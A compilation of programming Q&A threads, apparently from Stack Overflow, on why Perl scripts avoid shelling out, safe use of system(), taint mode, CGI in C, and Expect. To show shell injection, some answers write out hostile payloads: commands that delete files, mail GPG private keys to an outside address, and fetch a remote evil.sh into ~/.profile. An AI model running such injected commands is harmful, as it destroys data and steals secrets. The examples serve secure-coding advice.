Using system commands in Perl instead of built in libraries/functions [duplicate] - perl

On occasion I see people calling the system grep from Perl (and other scripting languages for that matter) instead of using the built-in language facilities/libraries to parse files. I would like to encourage people to use the built-in facilities and I want to solicit some reasons as to why it is good practice to use the built-in tools. I can think of some such as
Using libraries/language facilities is faster. Performance suffers due to the overhead of executing external commands.
Sticking to language facilities is more portable.
any other reasons?
On the other side of the coin, are there ever reasons to favour using system commands instead of the built-in language facilities? On that note, if a Perl script is basically only calling external commands (e.g. custom utilities without libraries), might it be better just to make a shell script of it?

Actually, when it matters, a specialized tool can be faster.
The real gains of keeping the work in Perl are:
Portability (even between machines with the same OS).
Ease of error detection.
Flexibility in handling of errors.
Greater customizability/flexibility.
Fewer "moving parts". (Are you sure you escaped everything and set up the environment correctly?)
Less expertise needed. (You don't need to know both Perl and the external tools (and their ports) to code and maintain the program.)
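As a rough sketch of the error-detection points above, the job usually handed to the system grep can be done with a regex filter in Perl itself. The function name matching_lines and the log path in the usage comment are made up for illustration.

```perl
use strict;
use warnings;

# Return the lines of $path that match $pattern (a qr// regex).
# Dies with the OS error message if the file cannot be opened.
sub matching_lines {
    my ($path, $pattern) = @_;
    open(my $fh, '<', $path) or die "Cannot open '$path': $!\n";
    my @hits = grep { /$pattern/ } <$fh>;
    close($fh);
    return @hits;
}

# Hypothetical usage:
#   print matching_lines('/var/log/app.log', qr/ERROR/);
```

A missing or unreadable file shows up as a Perl exception carrying the OS error text, rather than as an exit status and some text on stderr that would have to be interpreted.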
On that note, if a Perl script is basically only calling external commands (e.g. custom utilities without libraries), might it be better just to make a shell script of it?
Possibly. You can configure some shells to exit if any program returns an unsuccessful error code. This can make some scripts quite robust. For example, I have a couple of bash scripts featuring the line
trap 'e=$? ; echo "Error." ; exit $e' ERR

"On the other side of the coin, are there ever reasons to favour using system commands instead of the built-in language facilities? On that note, if a Perl script is basically only calling external commands (e.g. custom utilities without libraries), might it be better just to make a shell script of it?"
Risking the wrath of Perl hardliners here. But for me there is an easy reason to use system grep instead of perl grep: I know its syntax.
Same reason to use a Perl script instead of a bash script: I know how to do stuff in Perl and never bothered with bash script syntax.
And as we are talking scripts here, my main concern is getting it done quickly and reliably (and readably). At work I do not have to bother with portability, as all production is done on the very same system, down to the same software versions of everything for the whole product lifespan.
At home I do not have to care about lifetime or the like either, as the script is most likely single-purpose.
And in neither case do I care about performance or software security, as I would be using C++ or something else for commercial software or in time- or memory-limited scenarios.
Edit: I am not saying these reasons apply to everyone, or even to anyone else. But while in reality I do know how to use Perl's grep, I really have no idea how to write a bash script and most likely never will. Just putting a few lines in Perl is always faster for me.

Using external tools leads to more errors.
Moreover, you have to parse the results (if any) of the external command, which is another source of errors.
Needless to say, it is also bad in terms of security.

Related

Is running a C/C++ CGI script on Apache dangerous?

I am currently programming my own little website system (a script that compiles Markdown documents, and puts them in appropriate locations, thus making a quick, static website).
I would like to enable people who go to my (initially static) contact page, to send me a GnuPG-encrypted message.
Basically, the visitor writes his or her message in a contact form, clicks this checkbox if they want the message to be encrypted, and upon receiving the form, a C(?) program of mine calls system("gpg --encrypt --recipient 31A49121CD42FF00 --armor <the_message>");
(I have yet to determine how to effectively get the message contents and use it in a command without writing the unencrypted message to disk).
Is it (in)secure to use exec() in a self-made C program that processes form data? Is there a simpler way to achieve what I want to do (using a standalone script, because my website is static, to run GPG)? Any security considerations I haven’t thought about?
I am asking on here instead of Security SE because I am looking for answers with developers’ points of view.
As a security professional who makes at least a modest living consulting on the subject, and a rather prolific C programmer I can give you a few different thoughts on the subject.
When you are considering security of processes executing on your target, you have to consider a number of things and how someone may abuse the situation.
A glimpse
Let's look at the immediate security problem that I see just off hand, you are using the "system()" call directly on <the_message> ; Can you imagine the following:
the_message="hello and goodbye; rm -rf *; cat $HOME/.gpg/* | /usr/bin/sendmail -s 'these are the private keys' temporary_account#hotmail.com" or worse;
the_message="hello and goodbye; wget http://some.remote.system.com/evil.sh && mv evil.sh ~/.profile;"
So the first thing to do is never use anything provided by a user as a command or part of a command-line; save the message to a temporary text file and encrypt that;
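One way to keep user text out of the command line altogether is to hand it to the program on standard input. Here is a minimal sketch in Perl, assuming gpg reads the plaintext from stdin when no file is given. The helper name filter_through is made up, and the gpg invocation in the comment just reuses the key ID from the question.

```perl
use strict;
use warnings;
use IPC::Open2;

# Send $input to the standard input of @cmd and return its standard output.
# @cmd is passed as a list, so no shell ever parses it.
sub filter_through {
    my ($input, @cmd) = @_;
    my $pid = open2(my $from_cmd, my $to_cmd, @cmd);
    print {$to_cmd} $input;
    close($to_cmd);                       # signal end of input
    my $output = do { local $/; <$from_cmd> };
    close($from_cmd);
    waitpid($pid, 0);
    die "$cmd[0] exited with status " . ($? >> 8) . "\n" if $? != 0;
    return $output;
}

# Hypothetical usage with the recipient key from the question:
#   my $armored = filter_through($message,
#       'gpg', '--encrypt', '--recipient', '31A49121CD42FF00', '--armor');
```

Because the message never becomes part of a command string, "; rm -rf *" is just more text to encrypt. Note that writing all the input before reading any output can block on very large messages; for short contact-form text that should not matter, but treat it as a limitation of this sketch.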
A slightly deeper look
Okay, so what's going on in terms of using C? Before I give you the answer, I would like to say I love C; I almost exclusively program in C and have been a professional developer with a main focus on C for the last 24 years. Now, I would like to say that C is a horrid tool for writing a CGI program in, and you should only do it if you have a truly compelling reason. And after you find that reason, you should discard it anyway and abandon the thought.
Here are some reasons why you SHOULDN'T use C for a CGI interface.
CGI/1.1 is an ugly standard; It uses environment variables, stdin, and all sorts of character remapping and recoding just to get data across. You are invariably going to have to deal with either implementing a cgi interface or using libcgi or some equivalent library in order to deal with all the permutations, and at the end you'll just hate yourself for it.
When I used http://libcgi.sourceforge.net for a particular project, I had to debug, harden and augment it because it had some horrible buffer overflow issues left, right and center, non-existent UTF-8 support and limited control over authentication.
But even if you have that covered, C is generally a bad idea because a lot of the security issues arise out of the manual manipulation of memory that one has to do.
A higher level language (shell script, awk, perl, php etc.) is a much better tool to handle CGI; Perl was almost built for it, and PHP was specially built for it. Another advantage of using perl or PHP in your situation is that GnuPG modules are available so that you don't have to system() anything;
The key to good development is to use the easiest, most straightforward toolkit for the job; In your case I think you should NOT use C, as it would force you to do things that are already very well done for you in form of a proper CGI processing language such as PHP.
Those are my thoughts; I hope that you will

Executing system commands safely while coding in Perl

Should one really use external commands while coding in Perl? I see several disadvantages. It is not system-independent, and there may also be security risks. What do you think? If there is no alternative and you have to run shell commands from Perl, what is the safest way to execute a given command (checking the pid, uid, etc.)?
It depends on how hard it is going to be to replicate the functionality in Perl. If I needed to run the m4 macro processor on something, I'd not think of trying to replicate that functionality in Perl myself, and since there's no module on http://search.cpan.org/ that looks suitable, it would appear others agree with me. In that case, then, using the external program is sensible. On the other hand, if I needed to read the contents of a directory, then the combination of readdir() et al plus stat() or lstat() inside Perl is more sensible than futzing with the output of ls.
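For the directory case, something along these lines would do, as a sketch only. The function name file_sizes is made up, and it reports just the size of plain files.

```perl
use strict;
use warnings;
use Fcntl qw(:mode);

# Return a hash reference of { name => size in bytes } for the plain files
# in $dir, using opendir/readdir/lstat instead of parsing the output of ls.
sub file_sizes {
    my ($dir) = @_;
    opendir(my $dh, $dir) or die "Cannot open directory '$dir': $!\n";
    my %size;
    for my $name (readdir $dh) {
        next if $name eq '.' or $name eq '..';
        my @st = lstat("$dir/$name") or next;      # entry vanished; skip it
        $size{$name} = $st[7] if S_ISREG($st[2]);  # field 2: mode, 7: size
    }
    closedir($dh);
    return \%size;
}
```

File names containing spaces or newlines need no special handling here, which is where parsing ls output usually goes wrong.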
If you need to execute commands, think very carefully about how you invoke them. In particular, you probably want to avoid the shell interpreting the arguments, so use the array form of system (see also exec), etc, rather than a single string for the command plus arguments (which means the shell is used to process the command line).
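A minimal sketch of the list form, wrapped in a helper that also decodes $?. The name run_cmd is made up for illustration.

```perl
use strict;
use warnings;

# Run @cmd without a shell and return its exit code.
# Dies if the program could not be started or was killed by a signal.
sub run_cmd {
    my @cmd = @_;
    system { $cmd[0] } @cmd;    # indirect-object form: never uses a shell
    die "Failed to start $cmd[0]: $!\n" if $? == -1;
    die "$cmd[0] died from signal " . ($? & 127) . "\n" if $? & 127;
    return $? >> 8;
}

# Hypothetical usage: the file name is one argument, whatever it contains.
#   run_cmd('tail', '-n', '1', $file) == 0 or warn "tail failed\n";
```

By Unix convention an exit code of 0 means success, so the result has to be compared against 0 rather than tested for truth.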
Executing external commands can be expensive simply because it involves forking a new process and watching for its output if you need it.
Probably more importantly, should the external process fail for any reason, it may be difficult for your script to work out what happened. Worse still, external processes get stuck surprisingly often, and when one does, so does your script. You can use special tricks like opening a pipe and watching for output in a loop, but this is itself error-prone.
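One common guard against a stuck child is a timeout built from fork, exec and alarm. The following is a sketch under Unix assumptions, not a hardened implementation. The name run_with_timeout is made up, and there is a small race if the child exits at the very moment the alarm fires.

```perl
use strict;
use warnings;
use POSIX ();

# Run @cmd without a shell. Return its exit code, or undef if it was
# still running after $seconds and had to be killed.
sub run_with_timeout {
    my ($seconds, @cmd) = @_;
    my $pid = fork() // die "fork failed: $!\n";
    if ($pid == 0) {
        exec { $cmd[0] } @cmd or POSIX::_exit(127);   # child: exec failed
    }
    my $finished = eval {
        local $SIG{ALRM} = sub { die "timeout\n" };
        alarm $seconds;
        waitpid($pid, 0);
        alarm 0;
        1;
    };
    return $? >> 8 if $finished;
    die $@ if $@ ne "timeout\n";    # some unrelated error
    kill 'KILL', $pid;
    waitpid($pid, 0);               # reap the killed child
    return undef;
}
```

Even this much code shows why the answer calls such tricks error-prone: there is signal handling, reaping and a failure path to get right, none of which is needed when the work stays inside Perl.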
Perl is very capable of doing many things. So, if you stick to using only native Perl constructs and modules to accomplish your tasks, not only will it be faster because you never fork, but it will also be more reliable, and errors will be easier to catch by looking at the native Perl objects and structures returned by library routines. It will also generally be more portable across platforms.
If your script runs under elevated permissions (like root or under sudo), you should be very careful as to what external programs you execute. One of the simple ways to ensure basic security is to always specify commands by full path, like /usr/bin/grep (but still think twice and just do the grep in Perl itself!). However, even this may not be enough if an attacker is using the LD_PRELOAD mechanism to inject rogue shared libraries.
If you want to be very secure, consider enabling taint checks with the -T flag, like this:
#!/usr/bin/perl -T
Taint mode is also enabled automatically by Perl if your script is found to be running with differing real and effective user or group IDs.
Taint mode will severely limit your ability to do many things (like calling system()) without Perl complaining (see http://perldoc.perl.org/perlsec.html#Taint-mode for more), but it will give you much more confidence in your script's security.
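Under taint mode, outside data has to pass through a regex capture before it can be used in a command or file operation. A minimal sketch of such a check follows. The name clean_filename and the allowed character set are assumptions to adjust to your own needs.

```perl
use strict;
use warnings;

# Accept only simple file names: ASCII letters, digits, underscore, dot and
# hyphen, not starting with a dot or hyphen. Returns the validated name, or
# undef if the input looks suspicious. Under -T, the value captured in $1
# is no longer considered tainted.
sub clean_filename {
    my ($raw) = @_;
    return undef unless defined $raw;
    return $raw =~ /\A([A-Za-z0-9_][A-Za-z0-9_.\-]*)\z/ ? $1 : undef;
}
```

The same function is a useful whitelist check without -T as well. perlsec additionally recommends setting $ENV{PATH} to a known value before running anything external.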
Should one really use external commands while coding in Perl?
There's no single answer to this question. It all depends on what you are doing within the wide range of potential uses of Perl.
Are you using Perl as a glorified shell script on your local machine, or just trying to find a quick-and-dirty solution to your problem? In that case, it makes a lot of sense to run system commands if that is the easiest way to accomplish your task. Security and speed are not that important; what matters is the ability to code quickly.
On the other hand, are you writing a production program? In that case, you want secure, portable, efficient code. It is often preferable to write the functionality in Perl (or use a module), rather than calling an external program. At least, you should think hard about the benefits and drawbacks.

Are there any tools like Closure Compiler for compression and optimization of Perl/CGI?

I am trying to find some online tool for compressing and optimizing my perl. Is there any benefit to removal of (at a minimum) whitespace and comments from server side cgi?
Perl source undergoes a compilation phase; it is not directly interpreted. Perl code is executed on the server, not delivered to the client. Unlike JavaScript, there is no benefit from minification.
If you want to optimise, measure first where the bottle-neck is. I presume that switching from CGI to a persistent technology will give you a big pay-off.
Related:
How can I compile my Perl script so to reduce startup time?
How can I reduce Perl CGI script start-up time?
Edit:
You mention in a comment that you deploy on Apache httpd. To reduce start-up time without changing existing code, install mod_perl2 and run your CGI programs with the perl-script handler. In the long term, switch over your code base from CGI to PSGI and deploy on Plack::Handler::Apache2, or preferably, if you also have a FastCGI adapter for the web server, Plack::Handler::Net::FastCGI.
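For a feel of what PSGI code looks like, here is a minimal sketch. The application is just a subroutine that takes the request environment and returns a status, headers and body. The name app and the response text are made up. In a real .psgi file the last statement would return the code reference (for example \&app).

```perl
use strict;
use warnings;

# A PSGI application takes the request environment hash and returns
# an array reference of [status, headers, body].
sub app {
    my ($env) = @_;
    my $path = $env->{PATH_INFO} // '/';
    return [
        200,
        [ 'Content-Type' => 'text/plain' ],
        [ "You asked for $path\n" ],
    ];
}
```

Since the application stays loaded between requests, the per-request compile cost of plain CGI goes away.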
Perltidy is a free pretty-printer with a lot of options. Some of them might do what you want in some way, such as removing whitespace. It's not a minifier, but it is good to know nevertheless, and I'd recommend adding it to your toolchest.

How can I control an interactive Unix application programmatically through Perl?

I have inherited a 20-year-old interactive command-line unix application that is no longer supported by its vendor. We need to automate some tasks in this application.
The most troublesome of these is creating thousands of new records with slightly different parameters (e.g. different identifiers, different names). The records have to be created in sequence, one at a time, which would take many months (and therefore dollars) to do manually. In most cases, creating a record has a very predictable pattern of keying in commands, reading responses, keying in further commands, etc. However, some record creation operations will result in error conditions ('record with this identifier already exists') that require a different set of commands to exit gracefully.
I can see a few different ways to do this:
Named pipes. Write a Perl script that runs the target application with STDIN and STDOUT set to named pipes then sends the target application the sequence of commands to create a record with the required parameters, and then instructs the target application to exit and shut down. We then run the script as many times as required with different parameters.
Application. Find another Unix tool that can be used to script interactive programs. The only ones I have been able to find, though, are expect, which does not seem to be maintained, and chat, which I recall from ages ago and which seems to do more or less what I want, but appears to be only for controlling modems.
One more potential complication: I think the target application was written for a VT100 terminal and it uses some sort of escape sequences to do things like provide highlighting.
My question is what approach should I take? One of these, or something completely different? I quite like the idea of using named pipes and then having a Perl script that opens the FIFOs and reads and writes as required, as it provides a lot of flexibility, but from what I have read it seems like there's a lot of potential problems if I go down this path.
Thanks in advance.
I'd definitely stick to Perl for the extra flexibility, as chaos suggested. Are you aware of the Expect perl module? It's a lot nicer than the named pipe approach.
Note also with named pipes, you can't force the output coming back from your legacy application to be unbuffered, which could be annoying. I think Expect.pm uses pseudo-ttys to get around this problem, but I'm not sure. See the discussion in perlipc in the section "Bidirectional Communication with Another Process" for more details.
expect is a lot more solid than you're probably giving it credit for, but if I were you I'd still go with the Perl option, wanting to have a full and familiar programming language for managing the process and having confidence that whatever weird issues arise, there will be ways of addressing them.
Expect, either with the Tcl or Perl implementations, would be my first attempt. If you are seeing odd sequences in the output because it's doing odd terminal things, just filter those from the output before you do your matching.
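Filtering could be as simple as the following sketch, which assumes the application emits standard ANSI/VT100 CSI sequences (ESC [ ... final byte). The sequences the legacy program actually uses are unknown here, and the name strip_escapes is made up.

```perl
use strict;
use warnings;

# Remove ANSI/VT100 CSI escape sequences such as "\e[1m" (bold) or
# "\e[2J" (clear screen) so that plain-text patterns can match.
sub strip_escapes {
    my ($text) = @_;
    # ESC [, parameter bytes, intermediate bytes, one final byte
    $text =~ s/\e\[[\x30-\x3F]*[\x20-\x2F]*[\x40-\x7E]//g;
    return $text;
}
```

Run each chunk of output through this before matching on prompts or error messages.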
With named pipes, you're going to end up reinventing Expect anyway.

Why shouldn't I use shell tools in Perl code?

It is generally advised not to use additional Linux tools in Perl code.
For example, if someone wants to print the last line of a text file, they can do:
$last_line = `tail -1 $file` ;
or otherwise, open the file and read it line by line
open(my $info, '<', $file) or die "Cannot open $file: $!";
while (<$info>) {
    $last_line = $_ if eof($info);   # keep only the final line
}
close($info);
What are the pitfalls of the first approach, and why should I avoid using shell tools in my code?
thanx,
Efficiency - you don't have to spawn a new process
Portability - you don't have to worry about an executable not existing, accepting different switches, or having different output
Ease of use - you don't have to parse the output, the results are already in a usable form
Error handling - you have finer-grained control over errors and what to do about them in Perl.
It's better to keep all the action in Perl because it's faster and because it's more secure. It's faster because you're not spawning a new process, and it's more secure because you don't have to worry about shell meta character trickery.
For example, in your first case if $file contained "afilename ; rm -rf ~" you would be a very unhappy camper.
P.S. The best all-Perl way to do the tail is to use File::ReadBackwards.
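If installing a CPAN module is not an option, the same idea can be hand-rolled with core Perl only. This is not File::ReadBackwards, just a sketch of the technique behind it: seek to the end and read backwards in chunks until a full last line is in the buffer. The name last_line and the 4096-byte chunk size are arbitrary choices.

```perl
use strict;
use warnings;

# Return the last line of the file at $path (including its newline, if
# any), or undef for an empty file. Reads backwards in fixed-size chunks.
sub last_line {
    my ($path) = @_;
    open(my $fh, '<:raw', $path) or die "Cannot open '$path': $!\n";
    my $pos = (stat $fh)[7];     # file size: start at the end
    my $buf = '';
    while ($pos > 0) {
        my $len = $pos < 4096 ? $pos : 4096;
        $pos -= $len;
        seek($fh, $pos, 0) or die "Cannot seek in '$path': $!\n";
        defined read($fh, my $chunk, $len) or die "Cannot read '$path': $!\n";
        $buf = $chunk . $buf;
        # Stop once the buffer holds a newline that is not the final
        # character: everything after it is the complete last line.
        last if $buf =~ /\n./s;
    }
    close($fh);
    my @lines = split /^/, $buf;   # split into lines, keeping newlines
    return @lines ? $lines[-1] : undef;
}
```

Unlike the read-every-line loop, this touches only the tail of the file, and the file name is never seen by a shell. It works on raw bytes, so decode the result if the file is not plain ASCII.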
One of the primary reasons (besides portability) for not executing shell commands is that it introduces overhead by spawning another process. That's why much of the same functionality is available via CPAN in Perl modules.
One reason is that your Perl code might be running in an environment where there is no shell tool called 'tail'.
It's a personal call depending on the project:
Is it going to be always used in shell environments with tail?
Do you care about only using pure Perl code?
Using tail? Fine. But that's really a special case, since it's so easy to use and since it is so trivial.
The problem in general is not really efficiency or portability, that is largely irrelevant; the issue is ease of use. To run an external utility, you have to find out what arguments it accepts, write code to transform your program's data structures to that format, quote them properly, build the command line, and run the application. Then, you might have to feed it data and read data from it (involving complexity like an event loop, worrying about deadlocking, etc.), and finally interpret the return value. (UNIX processes consider "0" true and anything else false, but Perl assumes the opposite. foo() and die is hard to read.) This is a lot of work to do, and that's why people avoid it. It's much easier to create an instance of a class and call methods on it to get the data you need.
(You can abstract away processes this way; see Crypt::GpgME for example. It handles the complexity associated with invoking gpg, which would normally involve creating multiple filehandles other than STDOUT, STDIN, and STDERR, among other things.)
The main reason I see for doing it all in Perl would be for robustness. Your use of tail will fail if the filename has shell metacharacters or spaces or doesn't exist or isn't accessible. From Perl, characters in the filename aren't an issue, and you can distinguish between errors in accessing the file. Sometimes being robust is more important than speedy coding and sometimes it's not.
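To illustrate the point about distinguishing errors, here is a small sketch using the %! hash that Perl provides for errno checks. The function name open_or_reason and the reason strings are made up.

```perl
use strict;
use warnings;

# Try to open $path for reading. Returns (filehandle, undef) on success,
# or (undef, reason) where reason is 'missing', 'denied' or the OS message.
sub open_or_reason {
    my ($path) = @_;
    open(my $fh, '<', $path) and return ($fh, undef);
    return (undef, 'missing') if $!{ENOENT};
    return (undef, 'denied')  if $!{EACCES};
    return (undef, "$!");
}
```

With the backtick version, all of these cases collapse into an empty string plus whatever tail printed on stderr.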